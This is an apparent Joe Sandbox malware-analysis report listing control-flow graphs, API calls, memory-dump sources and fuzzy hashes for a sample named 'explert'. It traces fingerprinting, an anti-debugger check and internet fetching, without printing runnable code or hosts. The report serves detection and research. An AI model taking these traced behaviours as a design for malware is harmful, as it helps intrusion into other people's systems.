• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID:
• API String ID: 4237864984-0
• Opcode ID: 4c539c2fc8051c0196bc47cec4a7182b86f1f87712b5fc48867f291bf6e90bd6
• Instruction ID: ba69e0dcb8b7ccb3a1941417c916953a424dc52926e956062a3c52aaa440fc15
• Opcode Fuzzy Hash: 4c539c2fc8051c0196bc47cec4a7182b86f1f87712b5fc48867f291bf6e90bd6
• Instruction Fuzzy Hash: 65A13232A041058FDF19AF68DC56BAE3FA0BF46320F14014AE812FB2D1DB358D5ADB52

Control-flow Graph

control_flow_graph 1663 55d0a4-55d0b0 1664 55d157-55d15a 1663->1664 1665 55d0b5-55d0c6 1664->1665 1666 55d160 1664->1666 1668 55d0d3-55d0ec LoadLibraryExW 1665->1668 1669 55d0c8-55d0cb 1665->1669 1667 55d162-55d166 1666->1667 1670 55d13e-55d147 1668->1670 1671 55d0ee-55d0f7 GetLastError 1668->1671 1672 55d154 1669->1672 1673 55d0d1 1669->1673 1674 55d150-55d152 1670->1674 1677 55d149-55d14a FreeLibrary 1670->1677 1675 55d12e 1671->1675 1676 55d0f9-55d10b call 55c718 1671->1676 1672->1664 1673->1674 1674->1672 1680 55d167-55d169 1674->1680 1679 55d130-55d132 1675->1679 1676->1675 1683 55d10d-55d11f call 55c718 1676->1683 1677->1674 1679->1670 1682 55d134-55d13c 1679->1682 1680->1667 1682->1672 1683->1675 1686 55d121-55d12c LoadLibraryExW 1683->1686 1686->1679
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: 3f4f34e212d94c516a7bba8bbaed6f269770bb8f2bd403aec9942f50b6cb93de
• Instruction ID: d1c2bd4c3c0ebe1ee2da6a4b28cf18e7f87bf4a7738e5e62b937cfcacdd77001
• Opcode Fuzzy Hash: 3f4f34e212d94c516a7bba8bbaed6f269770bb8f2bd403aec9942f50b6cb93de
• Instruction Fuzzy Hash: C721D877A01711ABCB314B64DC55A1B3FB8BB157A2F110512FC16A7290E670DD09D6F0

Control-flow Graph

control_flow_graph 1687 539de0-539df4 1688 539df6 1687->1688 1689 539df8-539e11 RegOpenKeyExA 1687->1689 1688->1689 1690 539e13-539e21 1689->1690 1691 539e4b-539e65 1689->1691 1692 539e23 1690->1692 1693 539e25-539e43 RegQueryValueExA 1690->1693 1692->1693 1694 539e66-539e89 RegCloseKey 1693->1694 1695 539e45 RegCloseKey 1693->1695 1696 539e90-539e95 1694->1696 1695->1691 1696->1696 1697 539e97-539eae call 531820 1696->1697
APIs
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?), ref: 00539E09
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,000000FF), ref: 00539E38
• RegCloseKey.ADVAPI32(?), ref: 00539E45
• RegCloseKey.KERNELBASE(?), ref: 00539E66
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID:
• API String ID: 1607946009-0
• Opcode ID: 629342a35ed914dec1659d3d6f7d505b420cf048e3f0d0b96021553b37abba61
• Instruction ID: 92735f3a86dbcc0b45baf869c7b269e35429ee1b5e30bff54f8f42f09207d4a8
• Opcode Fuzzy Hash: 629342a35ed914dec1659d3d6f7d505b420cf048e3f0d0b96021553b37abba61
• Instruction Fuzzy Hash: 37216F7410020AAFEB25DF18DC49BA67BB8FF05704F00459CE8568B291D7F1A958DBA1

Control-flow Graph

control_flow_graph 1741 5448b0-5448ce GetUserNameA 1742 5448d0-5448ed 1741->1742 1743 54490c-54491b 1741->1743 1744 5448f0-5448f5 1742->1744 1745 544921-54492a 1743->1745 1746 5449ec-544a09 1743->1746 1744->1744 1747 5448f7-54490b call 531820 1744->1747 1748 5449c0-5449ea 1745->1748 1749 544930-5449bd 1745->1749 1750 544a10-544a15 1746->1750 1748->1746 1748->1748 1749->1746 1750->1750 1752 544a17-544a2b call 531820 1750->1752
APIs
• GetUserNameA.ADVAPI32(?,?), ref: 005448C6
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: NameUser
• String ID: A
• API String ID: 2645101109-3554254475
• Opcode ID: bab11965628ffe76859df2c3f25d4e40eef0d8cf596bdf7afd37db625645d596
• Instruction ID: 4d946032dc3a56fa8c5f7cbe9c010bd538ed8b6f16a34c65809f3ee64724c30c
• Opcode Fuzzy Hash: bab11965628ffe76859df2c3f25d4e40eef0d8cf596bdf7afd37db625645d596
• Instruction Fuzzy Hash: 174167799116058FEB06CF78D8163E5BB78EF22388F00C75DE851B7652F771624A9B40

Control-flow Graph

control_flow_graph 1756 56ad21-56ad55 call 5642f4 call 5593c7 1761 56ad57-56ad5a 1756->1761 1762 56ad5c-56ad71 call 56adaf 1756->1762 1763 56ad7b-56ad7f 1761->1763 1765 56ad76-56ad79 1762->1765 1766 56ad81-56ad89 call 55ce37 1763->1766 1767 56ad8a-56ad8e 1763->1767 1765->1763 1766->1767
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: _free
• String ID: f'V
• API String ID: 269201875-3956680740
• Opcode ID: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
• Instruction ID: ec415389b3ffccc7a67ad916264bedbd6348f463199ac62576a7fe44cd6f45ed
• Opcode Fuzzy Hash: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
• Instruction Fuzzy Hash: C6012872C0015AAFCF42AFA8CD059EE7FB5BF48310F144566BD25A31A1E6318A209F91

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1778 55d16b-55d193 1779 55d195-55d197 1778->1779 1780 55d199-55d19b 1778->1780 1781 55d1ea-55d1ed 1779->1781 1782 55d1a1-55d1a8 call 55d0a4 1780->1782 1783 55d19d-55d19f 1780->1783 1785 55d1ad-55d1b1 1782->1785 1783->1781 1786 55d1d0-55d1e7 1785->1786 1787 55d1b3-55d1c1 GetProcAddress 1785->1787 1789 55d1e9 1786->1789 1787->1786 1788 55d1c3-55d1ce call 556490 1787->1788 1788->1789 1789->1781
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c9e73fbf11435ee47cf81903510c5cff0509b64b2d0b1e20e767f4c5117c430
• Instruction ID: ade1e4ad158987e02c819514af9837c97ae16e44d2e30b49bd2f2af9d4d254e9
• Opcode Fuzzy Hash: 1c9e73fbf11435ee47cf81903510c5cff0509b64b2d0b1e20e767f4c5117c430
• Instruction Fuzzy Hash: E301D233600A119F9F21DE69FC69A5A3BE6BBD43217144122FD05CB194DB309849E7A0

Control-flow Graph

control_flow_graph 1792 562727-56274d call 5624fd 1795 5627a6-5627a9 1792->1795 1796 56274f-562761 call 56ad8f 1792->1796 1798 562766-56276b 1796->1798 1798->1795 1799 56276d-5627a5 1798->1799
APIs
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 112b5184237859e459e1fa231471a9fa29108ea12b5a22f0ad2e8a494b8a389d
• Instruction ID: 4954d849fd3792bf00f1c0c665be58c6204fa98328f5f7c5e36fe0c262d1fce4
• Opcode Fuzzy Hash: 112b5184237859e459e1fa231471a9fa29108ea12b5a22f0ad2e8a494b8a389d
• Instruction Fuzzy Hash: FD111575A0420AAFCF05DF58E945E9A7BF4FF88314F0440A9F809AB251DA30EA15CB65

Control-flow Graph

control_flow_graph 1800 56aa68-56aa8c CreateFileW
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,0056AE58,?,?,00000000,?,0056AE58,00000000,0000000C), ref: 0056AA85
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: bc4f26548cab29dcdf5fa581062eab4ae9efa999914525678968959c335f1fd2
• Instruction ID: 1e0873d91cab1dbd05821ebf2a20af12b7bfe61106de6bcbf8381365ea1d6510
• Opcode Fuzzy Hash: bc4f26548cab29dcdf5fa581062eab4ae9efa999914525678968959c335f1fd2
• Instruction Fuzzy Hash: 74D06C3201014DFBDF028F84DD06EDA3BAAFB48724F014010FE1856020C772E862AB90
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,~V,00000002,00000000,?,?,?,00567EEB,?,00000000), ref: 00567C66
• GetLocaleInfoW.KERNEL32(?,20001004,~V,00000002,00000000,?,?,?,00567EEB,?,00000000), ref: 00567C8F
• GetACP.KERNEL32(?,?,00567EEB,?,00000000), ref: 00567CA4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP$~V
• API String ID: 2299586839-518811989
• Opcode ID: 9108595b67c7a2e53fdbb61d22b546a37b9f5af71e186f9c9d0b9d3119a76269
• Instruction ID: 6ac70a526f2a4cf13a13affff3cd085a83d44ae3672ca193560d324d4fe1fae5
• Opcode Fuzzy Hash: 9108595b67c7a2e53fdbb61d22b546a37b9f5af71e186f9c9d0b9d3119a76269
• Instruction Fuzzy Hash: 05210A32608108EAFB34CF58C909A977FE6FF58B59B668864E80AC7114FB32DD40D350
APIs
  • Part of subcall function 0055CA90: GetLastError.KERNEL32(00531920,00000001,00531924,00556D0D,00000001,00000000,00000000,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CA95
  • Part of subcall function 0055CA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CB33
  • Part of subcall function 0055CA90: _free.LIBCMT ref: 0055CAF2
  • Part of subcall function 0055CA90: _free.LIBCMT ref: 0055CB28
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00567EAE
• IsValidCodePage.KERNEL32(00000000), ref: 00567EF7
• IsValidLocale.KERNEL32(?,00000001), ref: 00567F06
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00567F4E
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00567F6D
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
• String ID:
• API String ID: 949163717-0
• Opcode ID: 440f6a19ddd1844c697a9c8710c054bd71b70a8acab12fb92dde36598b6e05c8
• Instruction ID: 61996dddf9b32201c9d4f9128cb804046bbcaa7207d5ad7bd35bbc6d96dd5d33
• Opcode Fuzzy Hash: 440f6a19ddd1844c697a9c8710c054bd71b70a8acab12fb92dde36598b6e05c8
• Instruction Fuzzy Hash: E7516F75A0420AAFDB10DFB4DC45ABA7BBCFF58704F1444A9E910EB150E7719D48CB60
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00551440
• IsDebuggerPresent.KERNEL32 ref: 0055150C
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0055152C
• UnhandledExceptionFilter.KERNEL32(?), ref: 00551536
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 1e1e4c772b3163a201d95e484868ca003b4ebc8605b90b58b9ca13cd9513283b
                                                                                                                                                                                            • Instruction ID: 6d5af0dd3d53e97d06441e8b4f58bde6f6c6552bf08b35ec74610b0a32e07000
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e1e4c772b3163a201d95e484868ca003b4ebc8605b90b58b9ca13cd9513283b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 96313A75D012189BDB20DFA4D9497CCBBB8BF48301F10409AE40DAB250EB709A88DF05
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00550788
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00550796
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005507A7
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005507B8
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005507C9
• GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005507DA
• GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 005507EB
• GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005507FC
• GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0055080D
• GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0055081E
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0055082F
• GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00550840
• GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00550851
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00550862
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00550873
• GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00550884
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00550895
• GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005508A6
• GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 005508B7
• GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 005508C8
• GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 005508D9
• GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 005508EA
• GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 005508FB
• GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0055090C
• GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0055091D
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0055092E
• GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0055093F
• GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00550950
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00550961
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00550972
• GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00550983
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00550994
• GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 005509A5
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 005509B6
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 005509C7
• GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 005509D8
• GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 005509E9
• GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 005509FA
• GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00550A0B
• GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00550A1C
• GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00550A2D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
• API String ID: 667068680-295688737
• Opcode ID: 865a371dcac076b4d1d27590b11a09389908cc4a5bf0c6a36042da00dd23ca63
• Instruction ID: 04d429c7bfe5c73faa052543cef3817836b7565d1e0cb73cf7b62e2ddb58803f
• Opcode Fuzzy Hash: 865a371dcac076b4d1d27590b11a09389908cc4a5bf0c6a36042da00dd23ca63
• Instruction Fuzzy Hash: 14610E75952310EF97906BB8BE0E84A3EE8FA2D6157007516FA09E31E0D6F4B00DBF91
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: _free$Info
• String ID: 0!W
• API String ID: 2509303402-2730159414
• Opcode ID: c81eec7c713a858439f49a1fe97104827893df8abb220a84e020e37b9b731ea7
• Instruction ID: 719ac22bd06c6b14894b5909f068964ca8ab17a555fea900dd57301001ef475e
• Opcode Fuzzy Hash: c81eec7c713a858439f49a1fe97104827893df8abb220a84e020e37b9b731ea7
• Instruction Fuzzy Hash: ACD18C71D003469FDB118FA8C895BBEBFF5FF48301F14456AE895AB282DB71A849CB50
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00532BA1
• InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 00532C1D
• InternetCloseHandle.WININET(00000000), ref: 00532C2A
• InternetCloseHandle.WININET(00000000), ref: 00532C98
• InternetCloseHandle.WININET(00000000), ref: 00532C9B
• InternetReadFile.WININET(00000000,?,00002000,?), ref: 00532CC7
• InternetReadFile.WININET(00000000,?,00002000,?), ref: 00532CFE
• InternetCloseHandle.WININET(00000000), ref: 00532D52
• InternetCloseHandle.WININET(00000000), ref: 00532D55
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Internet$CloseHandle$FileOpenRead
• String ID: ""~|fP$,V$33333333$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$sHM
• API String ID: 3539267403-3729596889
• Opcode ID: 744e0d3086687a5ffe00173b3f3508765a7f284d0bf758457be2f97d93eedccb
• Instruction ID: c715e586d27f767f29000507bdc943e2113d9b560d7e8e909b1264409609160f
• Opcode Fuzzy Hash: 744e0d3086687a5ffe00173b3f3508765a7f284d0bf758457be2f97d93eedccb
• Instruction Fuzzy Hash: 06B1F535D106089BDB02CB78DC46BE9B7B8BF66341F10876AF904B7151FB70AAC68B40
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0053BFE5
• std::_Lockit::_Lockit.LIBCPMT ref: 0053C000
• std::_Lockit::~_Lockit.LIBCPMT ref: 0053C020
• std::_Lockit::~_Lockit.LIBCPMT ref: 0053C071
• std::_Facet_Register.LIBCPMT ref: 0053C167
• std::_Lockit::~_Lockit.LIBCPMT ref: 0053C17F
• Concurrency::cancel_current_task.LIBCPMT ref: 0053C18D
• Concurrency::cancel_current_task.LIBCPMT ref: 0053C192
• Concurrency::cancel_current_task.LIBCPMT ref: 0053C197
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: std::_$Lockit$Concurrency::cancel_current_taskLockit::~_$Lockit::_$Facet_Register
                                                                                                                                                                                            • String ID: N#T$N#T$dV$false$true
                                                                                                                                                                                            • API String ID: 1941589060-4048706568
                                                                                                                                                                                            • Opcode ID: cde01a473f47941b9dd03a2abcbd20a3ae6fa6dab01d1863857de8fc7982be28
                                                                                                                                                                                            • Instruction ID: 5504db16eca0274ac66efa2d118c3390a2ecdf790b0d0d857d9bc94b64d473d2
                                                                                                                                                                                            • Opcode Fuzzy Hash: cde01a473f47941b9dd03a2abcbd20a3ae6fa6dab01d1863857de8fc7982be28
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF51D335A01301DFCB24EFA8D859A9ABFA0BF54310F14446DEC09AB352EB71ED49DB81
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?), ref: 005313DD
                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?), ref: 005313FB
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?), ref: 00531405
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000,00000000,?,00000104,?,?), ref: 0053144A
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 00531455
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 0053175F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
